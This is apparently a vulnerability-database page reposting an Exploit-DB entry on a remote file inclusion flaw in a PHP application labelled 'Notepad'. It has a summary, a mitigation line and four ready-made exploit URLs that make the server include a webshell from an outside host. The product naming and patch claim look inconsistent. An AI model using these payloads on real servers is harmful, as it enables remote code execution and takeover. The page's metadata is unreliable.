Notepad Remote File Inclusion Vulnerability

vendor:

Notepad

by:

Engel Pemula

8.8

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: Notepad

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Notepad Remote File Inclusion Vulnerability

Notepad is vulnerable to a Remote File Inclusion (RFI) vulnerability which allows an attacker to include a remote file containing arbitrary code, resulting in arbitrary code execution on the vulnerable server. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'GLOBALS[OCSP][DEFAULTCONFPATH]', 'GLOBALS[PROJECT][PHPINCPATH]' parameters in the 'newClient.php', 'index.php', 'calendar.php', 'forms/calendar.php' scripts. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the vulnerable parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to apply the patch as soon as possible.

Source

Exploit-DB raw data:

                                    
[@]================================================================================================================================================[@]
						 
[+] Location    	 : notepad						 
[+] Situs          	 : www[dot]manadocoding[dot]net						    	 					
[+] Contact        	 : engelpemula[at]gmail[dot]com							 
[+] Download Script	 : http://sourceforge.net/projects/opencsp/					 	
[@]================================================================================================================================================[@]



[@]================================================================================================================================================[@]
[+] 3xpl0it		 : http://server/htsystem/admin/client/newClient.php?GLOBALS[OCSP][DEFAULTCONFPATH]=http://example.com/webshell.txt?
[+]                        http://server/htsystem/admin/modules/galerie/index.php?GLOBALS[OCSP][DEFAULTCONFPATH]=http://example.com/webshell.txt?
[+]                        http://server/htsystem/system/calendar.php?GLOBALS[PROJECT][PHPINCPATH]=http://example.com/webshell.txt?
[+]                        http://server/htsystem/system/forms/calendar.php?GLOBALS[PROJECT][PHPINCPATH]=http://example.com/webshell.txt?
[@]================================================================================================================================================[@]


[@]================================================================================================================================================[@]
[+] Greetz t00		 : All crew ManadoCoding [manadocoding.net]                                              
[+]                                                                                             	
[+]                        All Crew SekuritiOnline [sekuritionline.net]					
[@]================================================================================================================================================[@]


[@]================================================================================================================================================[@]
[+] Note		 : Anxiety in a man's heart weighs it down, but an encouraging word makes it glad (Proverbs 12:25)                                                                       
[@]================================================================================================================================================[@]

                                                        Thanks God for this day

			 	                           * GOD BLESS ALL *